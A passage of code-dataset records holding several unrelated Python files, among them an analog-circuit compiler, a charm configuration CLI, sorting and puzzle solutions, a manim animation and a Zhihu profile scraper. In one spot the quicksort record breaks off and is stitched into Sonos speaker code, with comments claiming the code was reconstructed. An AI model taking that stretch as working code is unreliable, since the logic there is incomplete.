\"open_platform_dict.json\"\n\ndef cmp(x,y):\n if x < y:\n return -1\n elif x == y:\n return 0\n else:\n return 1\n\ndef sorted_tags(top = 10):\n df = open(dict_p, \"r\")\n ori_json = json.loads(df.read())\n df.close() #close the file once its contents are loaded\n tags = []\n app_tags = []\n content_tags = []\n for i in ori_json[\"recommendationHotWords\"]:\n app_tags = list(app_tags + i[\"tags\"])\n #print(len(i[\"tags\"]), i[\"name\"], i[\"tags\"])\n for i in ori_json[\"appHotWords\"]:\n content_tags = list(content_tags + i[\"tags\"])\n #print(len(i[\"tags\"]), 
i[\"name\"], i[\"tags\"])\n app_tags = list(set(app_tags))\n content_tags = list(set(content_tags))\n app_tags.sort(key=len, reverse=True)\n content_tags.sort(key=len, reverse=True)\n\n '''\n for k in ori_json.keys():\n for i in ori_json[k]:\n tags = list(tags + i[\"tags\"])\n #tags.sort(lambda x,y: cmp(len(x), len(y))))\n orig_tags = tags\n tags.sort(key=len, reverse=True)\n\n if len(tags)-1 < top:\n top = len(tags) - 1\n df.close()\n return tags[0:top], orig_tags\n '''\n return app_tags,content_tags\n\ndef search_tags(t):\n pat = re.compile(\"^.*\"+t+\".*$\")\n app_tag_list, content_tag_list = sorted_tags()\n\n hit_app_tags = []\n hit_content_tag = []\n print(\"app tags:\")\n for i in app_tag_list:\n if pat.match(i):\n hit_app_tags.append(i)\n print(i)\n\n print(\"----------\")\n print(\"content tags:\")\n for i in content_tag_list:\n if pat.match(i):\n hit_content_tag.append(i)\n print(i)\n\n\n\nif __name__ == \"__main__\":\n #t = sys.argv[1]\n t = \"kcrw\"\n search_tags(t)","sub_path":"tags_sort.py","file_name":"tags_sort.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"500846419","text":"import asyncio\nimport argparse\nimport logging\nimport sys\n\nimport zaza.charm_lifecycle.utils as utils\n\n\ndef run_configure_list(functions):\n \"\"\"Run the configure scripts as defined in the list of test classes in\n series.\n\n :param functions: List of configure functions functions\n :type tests: ['zaza.charms_tests.svc.setup', ...]\n \"\"\"\n for func in functions:\n utils.get_class(func)()\n\n\ndef configure(model_name, functions):\n \"\"\"Run all post-deployment configuration steps\n\n :param functions: List of configure functions functions\n :type tests: ['zaza.charms_tests.svc.setup', ...]\"\"\"\n utils.set_juju_model(model_name)\n run_configure_list(functions)\n\n\ndef parse_args(args):\n \"\"\"Parse command line arguments\n\n :param args: List of configure functions functions\n :type list: [str1, str2,...] 
List of command line arguments\n :returns: Parsed arguments\n :rtype: Namespace\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--configfuncs', nargs='+',\n help='Space sperated list of config functions',\n required=False)\n parser.add_argument('-m', '--model-name', help='Name of model to remove',\n required=True)\n return parser.parse_args(args)\n\n\ndef main():\n \"\"\"Run the configuration defined by the command line args or if none were\n provided read the configuration functions from the charms tests.yaml\n config file\"\"\"\n logging.basicConfig(level=logging.INFO)\n args = parse_args(sys.argv[1:])\n funcs = args.configfuncs or utils.get_charm_config()['configure']\n configure(args.model_name, funcs)\n asyncio.get_event_loop().close()\n","sub_path":"zaza/charm_lifecycle/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"7058580","text":"import pathlib\nimport pprint\n\nfrom .util import _write_circuit_graph, max_connectivity\nfrom .read_netlist import SpiceParser\nfrom .match_graph import read_inputs, read_setup,_mapped_graph_list,add_stacked_transistor,add_parallel_transistor,reduce_graph,define_SD,check_nodes,add_parallel_caps,add_series_res\nfrom .write_verilog_lef import WriteVerilog, WriteSpice, print_globals,print_header,generate_lef\nfrom .common_centroid_cap_constraint import WriteCap, check_common_centroid\nfrom .write_constraint import WriteConst, FindArray, CopyConstFile, FindSymmetry\nfrom .read_lef import read_lef\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ndef generate_hierarchy(netlist, subckt, output_dir, flatten_heirarchy, unit_size_mos , unit_size_cap):\n updated_ckt_list,library = compiler(netlist, subckt, flatten_heirarchy)\n return compiler_output(netlist, library, updated_ckt_list, subckt, output_dir, unit_size_mos , unit_size_cap)\n\ndef compiler(input_ckt:pathlib.Path, design_name:str, flat=0,Debug=True):\n \"\"\"\n Reads input spice file, converts to a graph format and create hierarchies in the graph \n\n Parameters\n ----------\n input_ckt : input circuit path\n DESCRIPTION.\n design_name : name of top level subckt in design\n DESCRIPTION.\n flat : TYPE, flat/hierarchical\n DESCRIPTION. The default is 0.\n Debug : TYPE, writes output graph for debug\n DESCRIPTION. The default is False.\n\n Returns\n -------\n updated_ckt_list : list of reduced graphs for each subckt\n DESCRIPTION. 
reduced graphs are subckts after identification of hierarchies\n library : TYPE, list of library graphs\n DESCRIPTION. Libraries are used to create hierarchies\n\n \"\"\"\n logger.info(\"Starting topology identification...\")\n input_dir=input_ckt.parents[0]\n logger.debug(f\"Reading subckt {input_ckt}\")\n sp = SpiceParser(input_ckt, design_name, flat)\n circuit = sp.sp_parser()[0]\n\n design_setup=read_setup(input_dir / f'{input_ckt.stem}.setup')\n logger.debug(f\"template parent path: {pathlib.Path(__file__).parent}\")\n lib_path=pathlib.Path(__file__).resolve().parent.parent / 'config' / 'basic_template.sp'\n logger.debug(f\"template library path: {lib_path}\")\n basic_lib = SpiceParser(lib_path)\n library = basic_lib.sp_parser()\n lib_path=pathlib.Path(__file__).resolve().parent.parent / 'config' / 'user_template.sp'\n user_lib = SpiceParser(lib_path)\n library += user_lib.sp_parser()\n library=sorted(library, key=lambda k: max_connectivity(k[\"graph\"]), reverse=True)\n logger.info(f\"dont use cells: {design_setup['DONT_USE_CELLS']}\")\n logger.info(f\"all library elements: {[ele['name'] for ele in library]}\")\n if len(design_setup['DONT_USE_CELLS'])>0:\n library=[lib_ele for lib_ele in library if lib_ele['name'] not in design_setup['DONT_USE_CELLS']]\n\n if Debug:\n _write_circuit_graph(circuit[\"name\"], circuit[\"graph\"],\n \"./circuit_graphs/\")\n for lib_circuit in library:\n _write_circuit_graph(lib_circuit[\"name\"], lib_circuit[\"graph\"],\n \"./circuit_graphs/\")\n hier_graph_dict=read_inputs(circuit[\"name\"],circuit[\"graph\"])\n\n updated_ckt_list = []\n check_duplicates={}\n for circuit_name, circuit in hier_graph_dict.items():\n logger.debug(f\"START MATCHING in circuit: {circuit_name}\")\n G1 = circuit[\"graph\"]\n if circuit_name in design_setup['DIGITAL']:\n mapped_graph_list = _mapped_graph_list(G1, library, design_setup['POWER']+design_setup['GND'] ,design_setup['CLOCK'], True )\n else:\n define_SD(G1,design_setup['POWER'],design_setup['GND'], design_setup['CLOCK'])\n logger.debug(f\"no of nodes: {len(G1)}\")\n add_parallel_caps(G1)\n add_series_res(G1)\n add_stacked_transistor(G1)\n add_parallel_transistor(G1)\n initial_size=len(G1)\n delta =1\n while delta > 0:\n logger.debug(\"CHECKING stacked transistors\")\n add_stacked_transistor(G1)\n add_parallel_transistor(G1)\n delta = initial_size - len(G1)\n initial_size = len(G1)\n mapped_graph_list = _mapped_graph_list(G1, library, design_setup['POWER']+design_setup['GND'] ,design_setup['CLOCK'], False )\n # reduce_graph converts the input hierarchical graph to a dictionary\n updated_circuit, Grest = reduce_graph(G1, mapped_graph_list,library,check_duplicates,design_setup)\n check_nodes(updated_circuit)\n updated_ckt_list.extend(updated_circuit)\n\n\n stop_points=design_setup['POWER']+design_setup['GND']+design_setup['CLOCK']\n if circuit_name not in design_setup['DIGITAL']:\n symmetry_blocks=FindSymmetry(Grest, circuit[\"ports\"], circuit[\"ports_weight\"], stop_points)\n for symm_blocks in symmetry_blocks.values():\n if isinstance(symm_blocks, dict) and \"graph\" in symm_blocks.keys():\n logger.debug(f\"added new hierarchy: {symm_blocks['name']} {symm_blocks['graph'].nodes()}\")\n updated_ckt_list.append(symm_blocks)\n\n updated_ckt_list.append({\n \"name\": circuit_name,\n \"graph\": Grest,\n \"ports\": circuit[\"ports\"],\n \"ports_weight\": circuit[\"ports_weight\"],\n \"ports_match\": circuit[\"connection\"],\n \"size\": len(Grest.nodes()),\n \"mos_body\":circuit[\"mos_body\"]\n })\n\n lib_names=[lib_ele['name'] 
for lib_ele in library]\n for lib_name, dupl in check_duplicates.items():\n if len(dupl)>1:\n print(dupl)\n lib_names+=[lib_name+'_type'+str(n) for n in range(len(dupl))]\n return updated_ckt_list, lib_names\n\ndef compiler_output(input_ckt, lib_names , updated_ckt_list, design_name:str, result_dir:pathlib.Path, unit_size_mos=12, unit_size_cap=12):\n \"\"\"\n search for constraints and write output in verilog format\n Parameters\n ----------\n input_ckt : TYPE. input circuit path\n DESCRIPTION. Used to take designer provided constraints\n library : TYPE. list of library graphs used\n DESCRIPTION.\n updated_ckt_list : TYPE. list of reduced circuit graph\n DESCRIPTION. this list is used to generate constraints\n design_name : TYPE. name of top level design\n DESCRIPTION.\n result_dir : TYPE. directory path for writing results\n DESCRIPTION. writes out a verilog netlist, spice file and constraints\n unit_size_mos : TYPE, Used as parameter for cell generator\n DESCRIPTION. Cells are generated on a uniform grid\n unit_size_cap : TYPE, Used as parameter for cell generator\n DESCRIPTION. The default is 12.\n\n Raises\n ------\n SystemExit: We don't handle floating ports in a design. They should be removed beforehand\n DESCRIPTION.\n\n Returns\n -------\n primitives : Input parameters for cell generator\n DESCRIPTION.\n\n \"\"\"\n \n if not result_dir.exists():\n result_dir.mkdir()\n logger.debug(f\"Writing results in dir: {result_dir} {updated_ckt_list}\")\n input_dir=input_ckt.parents[0]\n VERILOG_FP = open(result_dir / f'{design_name}.v', 'w')\n printed_mos = []\n logger.debug(\"writing spice file for cell generator\")\n\n ## File pointer for spice generator\n #SP_FP = open(result_dir / (design_name + '_blocks.sp'), 'w')\n print_header(VERILOG_FP, design_name)\n design_setup=read_setup(input_dir / (input_ckt.stem + '.setup'))\n try:\n POWER_PINS = [design_setup['GND'][0],design_setup['POWER'][0]]\n except (IndexError, ValueError):\n POWER_PINS=[]\n logger.error(\"no power and gnd definition, correct setup file\")\n\n #read lef to not write those modules as macros\n lef_path = pathlib.Path(__file__).resolve().parent.parent / 'config'\n ALL_LEF = read_lef(lef_path)\n logger.debug(f\"Available library cells: {', '.join(ALL_LEF)}\")\n # local hack for design vco_dtype,\n #their requirement is different sizes for nmos and pmos\n if 'vco_dtype_12' in design_name:\n unit_size_mos=37\n generated_module=[]\n primitives = {}\n duplicate_modules =[]\n for member in updated_ckt_list:\n name = member[\"name\"]\n if name in duplicate_modules:\n continue\n else:\n duplicate_modules.append(name)\n logger.debug(f\"Found module: {name}\")\n inoutpin = []\n logger.debug(f'found ports match: {member[\"ports_match\"]}')\n floating_ports=[]\n if member[\"ports_match\"]:\n for key in member[\"ports_match\"].keys():\n if key not in POWER_PINS:\n inoutpin.append(key)\n if member[\"ports\"]:\n logger.debug(f'Found module ports: {member[\"ports\"]} {member.keys()}')\n floating_ports = set(inoutpin) - set(member[\"ports\"]) - set(design_setup['POWER']) -set(design_setup['GND'])\n if 'mos_body' in member:\n floating_ports = floating_ports - set(member[\"mos_body\"])\n\n if len(list(floating_ports))> 0:\n logger.error(f\"floating ports found: {name} {floating_ports}\")\n raise SystemExit('Please remove floating ports')\n else:\n inoutpin = member[\"ports\"]\n\n graph = member[\"graph\"].copy()\n logger.debug(f\"Reading nodes from graph: {graph}\")\n for node, attr in graph.nodes(data=True):\n #lef_name = 
'_'.join(attr['inst_type'].split('_')[0:-1])\n if 'net' in attr['inst_type']: continue\n #Dropping floating ports\n #if attr['ports'\n lef_name = attr['inst_type'].split('_type')[0]\n if \"values\" in attr and (lef_name in ALL_LEF):\n block_name, block_args = generate_lef(\n lef_name, attr[\"values\"],\n primitives, unit_size_mos, unit_size_cap)\n block_name_ext = block_name.replace(lef_name,'')\n logger.debug(f\"Created new lef for: {block_name}\")\n # Only unit caps are generated\n if block_name.lower().startswith('cap'):\n graph.nodes[node]['inst_type'] = block_args['primitive']\n block_args['primitive']=block_name\n else:\n graph.nodes[node]['inst_type'] = block_name\n\n if block_name in primitives:\n assert block_args == primitives[block_name]\n else:\n primitives[block_name] = block_args\n else:\n logger.info(f\"No physical information found for: {name}\")\n\n\n if name in ALL_LEF:\n logger.debug(f\"writing spice for block: {name}\")\n #ws = WriteSpice(graph, name+block_name_ext, inoutpin, updated_ckt_list, lib_names)\n #ws.print_subckt(SP_FP)\n #ws.print_mos_subckt(SP_FP,printed_mos)\n continue\n\n logger.debug(f\"generated data for {name} : {pprint.pformat(primitives, indent=4)}\")\n if name not in ALL_LEF or name.split('_type')[0] not in ALL_LEF:\n #ws = WriteSpice(graph, name, inoutpin, updated_ckt_list, lib_names)\n #ws.print_subckt(SP_FP)\n #ws.print_mos_subckt(SP_FP,printed_mos)\n\n logger.debug(f\"call verilog writer for block: {name}\")\n wv = WriteVerilog(graph, name, inoutpin, updated_ckt_list, POWER_PINS)\n logger.debug(f\"call array finder for block: {name}\")\n all_array=FindArray(graph, input_dir, name,member[\"ports_weight\"] )\n logger.debug(f\"Copy const file for: {name}\")\n const_file = CopyConstFile(name, input_dir, result_dir)\n logger.debug(f\"cap constraint gen for block: {name}\")\n\n ##Removing constraints to fix cascoded cmc\n if name not in design_setup['DIGITAL'] and name not in lib_names:\n logger.debug(f\"call constraint generator writer for block: {name}\")\n stop_points=design_setup['POWER']+design_setup['GND']+design_setup['CLOCK']\n WriteConst(graph, result_dir, name, inoutpin, member[\"ports_weight\"],all_array, stop_points)\n WriteCap(graph, result_dir, name, unit_size_cap,all_array)\n check_common_centroid(graph,const_file,inoutpin)\n\n wv.print_module(VERILOG_FP)\n generated_module.append(name)\n if len(POWER_PINS)>0:\n print_globals(VERILOG_FP,POWER_PINS)\n VERILOG_FP.close() #close the output netlist once all modules are written\n #SP_FP.close()\n\n logger.info(\"Topology identification done !!!\")\n logger.info(f\"OUTPUT verilog netlist at: {result_dir}/{design_name}.v\")\n #logger.info(f\"OUTPUT spice netlist at: {result_dir}/{design_name}_blocks.sp\")\n logger.info(f\"OUTPUT const file at: {result_dir}/{design_name}.const\")\n print(\"compilation stage done\")\n return primitives\n","sub_path":"align/compiler/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":12931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"471258067","text":"def slicing(string):\n left, right = 0, 0\n u, v = '', ''\n for i in range(len(string)):\n if string[i] == '(':\n left += 1\n else:\n right += 1\n if left != 0 and right != 0 and left == right:\n u = string[0: i + 1]\n v = string[i + 1:]\n break\n return u, v\n\n\ndef is_right(string):\n stack = []\n for i in string:\n if i == '(':\n stack.append(i)\n else:\n if len(stack) == 0:\n return False\n stack.pop()\n return False if stack else True\n\n\ndef solution(string):\n answer = []\n # If the string is empty or already a valid bracket string, return it as is\n if string == '' or is_right(string):\n return string\n\n # Split the string into balanced bracket strings u and v\n u, v = slicing(string)\n\n # If u is a valid bracket string\n if is_right(u):\n next_v = solution(v)\n return u + next_v\n\n # If u is not a valid bracket string\n else:\n # Step 1: append '('\n answer += '('\n # Step 2: append the result of recursively solving v\n answer += solution(v)\n # Step 3: append ')'\n answer += ')'\n # Step 4: strip the first and last characters of u\n u = u[1:-1]\n # u is balanced, so rotating it by half its length should invert it;\n # that approach turned out wrong, so flip each character one by one\n new_u = ''\n for i in range(len(u)):\n if u[i] == '(':\n new_u += ')'\n else:\n new_u += '('\n answer += new_u\n return str(''.join(answer))","sub_path":"Simulation/괄호 변환_old.py","file_name":"괄호 변환_old.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"196592035","text":"#quick3\r\nimport time\r\nfrom time import sleep\r\n\r\ndef find_pivot(nlist,low,high):\r\n mid = (low+high)//2\r\n if nlist[low]<=nlist[mid]:\r\n if nlist[mid]<=nlist[high]:\r\n pivot = nlist[mid]\r\n temp = nlist[mid]\r\n nlist[mid] = nlist[high]\r\n nlist[high] = temp\r\n elif nlist[mid] > nlist[high]:\r\n if nlist[high] > nlist[low]:\r\n pivot = nlist[high]\r\n else:\r\n pivot = nlist[low]\r\n temp = nlist[low]\r\n nlist[low] = nlist[high]\r\n nlist[high] = temp\r\n else:\r\n if nlist[mid] > nlist[high]:\r\n pivot = nlist[mid]\r\n temp = nlist[mid]\r\n nlist[mid] = nlist[low]\r\n nlist[low] = nlist[high]\r\n nlist[high] = temp\r\n elif nlist[high] > nlist[mid]:\r\n if nlist[high] <= nlist[low]: \r\n pivot = nlist[high]\r\n temp = nlist[low]\r\n nlist[low] = nlist[mid]\r\n nlist[mid] = temp\r\n else:\r\n pivot = nlist[low]\r\n temp = nlist[high]\r\n nlist[high] = nlist[low]\r\n nlist[low] = nlist[mid]\r\n nlist[mid] = temp\r\n return pivot\r\n\r\ndef partition(nlist,low,high):\r\n pivot = find_pivot(nlist,low,high)\r\n first = low-1\r\n for i in range(low,high):\r\n if nlist[i]<=pivot:\r\n first = first + 1\r\n temp = nlist[first]\r\n nlist[first] = nlist[i]\r\n nlist[i] = temp\r\n temp = nlist[first+1]\r\n nlist[first+1] = nlist[high]\r\n nlist[high] = temp\t\r\n return first+1\r\n\r\ndef quicksortmed(nlist,low,high):\r\n start_time = time.time()\r\n if low<high: #standard recursion on both sides of the partition (reconstructed; the record is cut off here)\r\n mid = partition(nlist,low,high)\r\n quicksortmed(nlist,low,mid-1)\r\n quicksortmed(nlist,mid+1,high)\n if speaker.times_discovery_missed >= 2: #condition reconstructed from the print below; the start of this record is missing\n print('[Balancing] Sonos speaker {} removed after missing {} discovery cycles'.format(speaker.name, speaker.times_discovery_missed))\n await self.config.speaker_repository.remove_speaker(speaker.speaker_id, delete_from_runtime_store=True)\n\n await asyncio.sleep(15)\n\n def stop_discover_loop(self):\n \"\"\"Sets the flag to stop the discover loop\"\"\"\n self.discover_loop_exiting = True\n\n async def control_loop(self):\n \"\"\"Starts the control loop which consumes all control commands in the queue\"\"\"\n self.control_loop_exiting = False\n while not self.control_loop_exiting:\n command: SonosCommand = await self.control_queue.get()\n command.run(self.sonos_adapter)\n self.control_queue.task_done()\n\n def stop_control_loop(self):\n \"\"\"Sets the flag to stop the control loop\"\"\"\n self.control_loop_exiting = True\n\n def send_command(self, command: SonosCommand):\n \"\"\"Adds the command to the control queue\"\"\"\n self.control_queue.put_nowait(command)\n","sub_path":"backend/src/balancing/sonos.py","file_name":"sonos.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"306989666","text":"import cv2\nimport glob\n\n\ndef align_sizes(path_1, path_2):\n img1 = cv2.imread(path_1)\n img2 = cv2.imread(path_2)\n\n if (img1 is None or 
img2 is None):\n return\n elif (img1.shape[0] == img1.shape[1] and img2.shape[0] == img2.shape[1]\n and img1.shape[0] == img2.shape[0] and img1.shape[1] == img2.shape[1]):\n # artificial early return for speeding up process.\n return\n else:\n img1 = _assure_square(img1)\n img2 = _assure_square(img2)\n\n if (img1.shape[0] > img2.shape[0]):\n img1 = cv2.resize(img1, (img2.shape[0], img2.shape[1]))\n elif (img2.shape[0] > img1.shape[0]):\n img2 = cv2.resize(img2, (img1.shape[0], img1.shape[1]))\n\n cv2.imwrite(path_1, img1)\n cv2.imwrite(path_2, img2)\n\n\ndef _assure_square(img):\n if (img.shape[0] > img.shape[1]):\n return cv2.resize(img, (img.shape[0], img.shape[0]))\n elif (img.shape[1] > img.shape[0]):\n return cv2.resize(img, (img.shape[1], img.shape[1]))\n else:\n return img\n\n\nfiles = glob.glob('./*.jpg')\nfiles = sorted(files)\n\nprint(files)\n\nfor i in range(0, int(len(files) / 2)):\n from_index = i * 2\n to_index = from_index + 1\n\n first = files[from_index]\n second = files[to_index]\n\n if (first[0:20] != second[0:20]):\n print(first)\n print(second)\n raise ValueError(\"files must match\") #raising a bare string is invalid in Python 3\n\nfor i in range(0, int(len(files) / 2)):\n from_index = i * 2\n to_index = from_index + 1\n\n first = files[from_index]\n second = files[to_index]\n\n align_sizes(first, second)\n","sub_path":"preprocess/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"240726054","text":"from manimlib.imports import *\r\n\r\nclass Examples(GraphScene):\r\n def construct(self):\r\n \r\n rectangle = Rectangle(height = 3, width = 4, color = GREEN)\r\n square = Square(side_length = 5, color = PURPLE)\r\n circle = Circle(radius = 2, color = PINK)\r\n radius = Line(ORIGIN,2*RIGHT)\r\n \r\n radius.set_color(RED)\r\n\r\n rectangle_area_func = TextMobject(r\"$Area = f(Length, Breadth)$\")\r\n rectangle_area_func.scale(0.6)\r\n square_area_func = TextMobject(r\"$Area = f(Length)$\")\r\n circle_area_func = TextMobject(r\"$Area = f(r)$\")\r\n\r\n\r\n rectangle_area = TextMobject(r\"$Area = Length \\times Breadth$\")\r\n rectangle_area.scale(0.6)\r\n square_area = TextMobject(r\"$Area = Length^2$\")\r\n circle_area = TextMobject(r\"$Area = \\pi r^2$\")\r\n\r\n braces_rect1 = Brace(rectangle, LEFT)\r\n eq_text1 = braces_rect1.get_text(\"Length\")\r\n braces_rect2 = Brace(rectangle, UP)\r\n eq_text2 = braces_rect2.get_text(\"Breadth\")\r\n\r\n braces_square = Brace(square, LEFT)\r\n braces_square_text = braces_square.get_text(\"Length\")\r\n\r\n radius_text = TextMobject(\"r\")\r\n radius_text.next_to(radius,UP)\r\n\r\n \r\n\r\n self.play(ShowCreation(rectangle))\r\n self.wait(1)\r\n self.play(GrowFromCenter(braces_rect1),Write(eq_text1),GrowFromCenter(braces_rect2),Write(eq_text2))\r\n self.wait(1)\r\n self.play(Write(rectangle_area_func))\r\n self.wait(1)\r\n self.play(Transform(rectangle_area_func, rectangle_area))\r\n self.wait(1)\r\n self.play(FadeOut(braces_rect1),FadeOut(eq_text1),FadeOut(braces_rect2),FadeOut(eq_text2),FadeOut(rectangle_area_func))\r\n\r\n\r\n self.play(Transform(rectangle, square))\r\n self.wait(1)\r\n self.play(GrowFromCenter(braces_square),Write(braces_square_text))\r\n self.wait(1)\r\n self.play(Write(square_area_func))\r\n self.wait(1)\r\n self.play(Transform(square_area_func, square_area))\r\n self.wait(1)\r\n self.play(FadeOut(braces_square),FadeOut(braces_square_text),FadeOut(square_area_func))\r\n\r\n\r\n self.play(Transform(rectangle, circle))\r\n self.wait(1)\r\n 
self.play(ShowCreation(radius),Write(radius_text))\r\n self.wait(1)\r\n self.play(FadeOut(radius_text),FadeOut(radius))\r\n self.wait(1)\r\n self.play(Write(circle_area_func))\r\n self.wait(1)\r\n self.play(Transform(circle_area_func, circle_area))\r\n self.wait(1)\r\n self.play(FadeOut(circle_area_func))","sub_path":"FSF-2020/calculus-of-several-variables/multivariable-functions-and-paritial-derivatives/Multivariable Functions/multivariable_func_examples.py","file_name":"multivariable_func_examples.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96304332","text":"from concurrent.futures import ThreadPoolExecutor\nfrom queue import Queue\n\nfrom beans.people import TopicBestAnswererDetail\nfrom captcha import *\nfrom db import DB\nfrom utils import *\nfrom zhihu import *\n\nlogger = get_common_logger(__file__, \"topic_best_answerer_detail.log\")\n\n\n# noinspection PyBroadException\ndef handle_output(output):\n db = DB()\n sql = TopicBestAnswererDetail.insert_sql()\n count = 0\n while True:\n try:\n answerer = output.get()\n db.execute(sql, tuple(answerer))\n count += 1\n logger.debug(\"Insert topic best answerer detail:%s. Count:%s\", answerer, count)\n except BaseException:\n logger.fatal(\"Handle output unexpected error.\", exc_info=True)\n\n\n# noinspection PyBroadException\ndef get_people_detail(pid, output, cs):\n try:\n while True:\n cs.wait_until_clear()\n\n resp = ZhihuClient.people_detail(pid)\n if not resp.success:\n if resp.client_error_resource_not_found():\n logger.warning(\"Resource not found. id:%s\", pid)\n break\n elif resp.client_error_forbidden():\n # ask for killing captcha\n cs.help()\n continue\n elif resp.client_error_user_be_baned():\n logger.warning(\"User be baned. id:%s\", pid)\n break\n else:\n logger.warning(\"Other error. 
id:%s\", pid)\n continue\n\n detail = resp.data\n output.put(TopicBestAnswererDetail.from_dict(detail))\n break\n except BaseException:\n logger.fatal(\"Get people:%s detail unexpected error.\", pid, exc_info=True)\n\n\ndef dispatch():\n todo = Queue()\n output = Queue()\n cs = CaptchaService()\n\n db = DB()\n sql = \"select distinct(id) from topic_best_answerer\"\n for row in db.execute(sql):\n todo.put(row[0])\n logger.info(\"Todo size:%s\", todo.qsize())\n\n cs.start()\n with ThreadPoolExecutor(max_workers=50) as executor:\n # 一个专门线程处理输出\n executor.submit(handle_output, output)\n\n while not todo.empty():\n pid = todo.get()\n executor.submit(get_people_detail, pid, output, cs)\n\n\nif __name__ == '__main__':\n dispatch()\n","sub_path":"spiders/topic_best_answerer_detail.py","file_name":"topic_best_answerer_detail.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"358036605","text":"# List comprehensions\n# https://www.reddit.com/r/adventofcode/comments/e5u5fv/2019_day_4_solutions/\n\nlo, hi = 145852, 616942\n\n# Part 1\nstrings = [str(s) for s in range(lo, hi+1)]\nnodecrs = [s for s in strings if s == ''.join(sorted(list(s)))]\n# print len(nodecrs)\n\nrepeats = [str(i)*2 for i in range(10)]\n# print repeats\n\nresults = [s for s in nodecrs if any(d in s for d in repeats)]\nprint(\"Part 1:\",len(results))\n\n# Part 2\nlo , hi = 145852 , 616942\nstrings = [str(s) for s in range(lo, hi + 1)]\nnodecrs = [s for s in strings if s == ''.join(sorted(list(s)))]\nrepeats = [(str(i) * 2, str(i) * 3) for i in range(10)]\nresults = [s for s in nodecrs if any(d in s and not t in s for d, t in repeats)]\nprint(\"Part 2:\",len(results))\n","sub_path":"2019/day4_cheat.py","file_name":"day4_cheat.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}